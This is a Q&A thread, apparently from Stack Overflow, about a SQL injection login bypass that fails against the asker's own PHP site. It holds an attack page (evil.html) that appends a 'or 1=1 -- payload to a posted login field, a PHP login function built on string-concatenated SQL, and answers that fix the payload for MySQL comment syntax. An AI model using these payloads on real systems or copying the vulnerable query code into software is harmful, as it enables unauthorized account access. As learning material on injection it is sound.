# Simple SQL injection failing to auth user

Tags: php, sql-injection

**Background**

I've made a html page *evil.html* whereby when the user clicks on it they should be able to enter a username and click a submit button thereby logging them into the site that I created.

I would expect that the injection `'or 1=1 --` would mean if I submit a user with username `test` then the SQL query results in

> SELECT * FROM users WHERE userid='test' or 1=1 -- AND password='$hash'

which should mean that my user `test` is authenticated. However it is throwing a 500 where there are `+` signs where the spacing in the injection are.

My login parameter in the request looks like this:

`login:` `"test'or+1=1+--"`

Does anyone have any idea why this exploit is not working?

**evil.html**

```
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<script>
  function attack() {
    document.querySelector('#login').value += "'or 1=1 --";
  }
</script>
</head>
<body>
<form action="http://example.com/" onsubmit="attack();" method="POST">
  <input name="login" id="login" value="">
  <button>Submit</button>
</form>
</body>
</html>
```

**login.php**

```
function login($username, $password) {
    $sql = "SELECT * FROM users WHERE userid='$username'";
    $result = $this->db->query($sql);
    $user = $result->next();
    if (!$user) {
        return false;
    }
    $salt = $user['salt'];
    $hash = md5($salt.$password);
    $sql = "SELECT * FROM users WHERE userid='$username' AND password='$hash'";
    $userdata = $this->db->query($sql)->next();
    if ($userdata) {
    // user is logged in
    // doStuff()
    }
}
```

Comment: What is the error text?

Comment: @u_mulder Upon further inspection, it looks like the `'` in the injection `' or 1=1 --` is causing the error, though I'm not sure why.  As for the error text, it just says `500 Internal Server Error`, theres no response body coming back.

Comment: Check the server log for details on what is causing the 500 error.

Answer (score 0):

Try adding a space after the double hyphen.

So, from

`.value += "'or 1=1 --";`
to
`.value += "'or 1=1 -- ";`

Answer (score 0):

The plus is an URL-encrypted form of a space. So it's perfectly fine at this point (cf. [URL encoding the space character: + or %20?](https://stackoverflow.com/questions/1634271/url-encoding-the-space-character-or-20)
).

In the widely used relational database management systems from Microsoft, Oracle, PostgreSQL and MySQL, a comment can be introduced with `--`. MySQL is a bit fussy here. It would like to have a space after the `--`  otherwise it won't recognize it.

So a valid exploit should be:

`"test'or+1=1+--+"`

You can also try another mySQL notation like '#comment'

`"test'or+1=1+#"`

Cf. the section "Comments" in https://portswigger.net/web-security/sql-injection/cheat-sheet.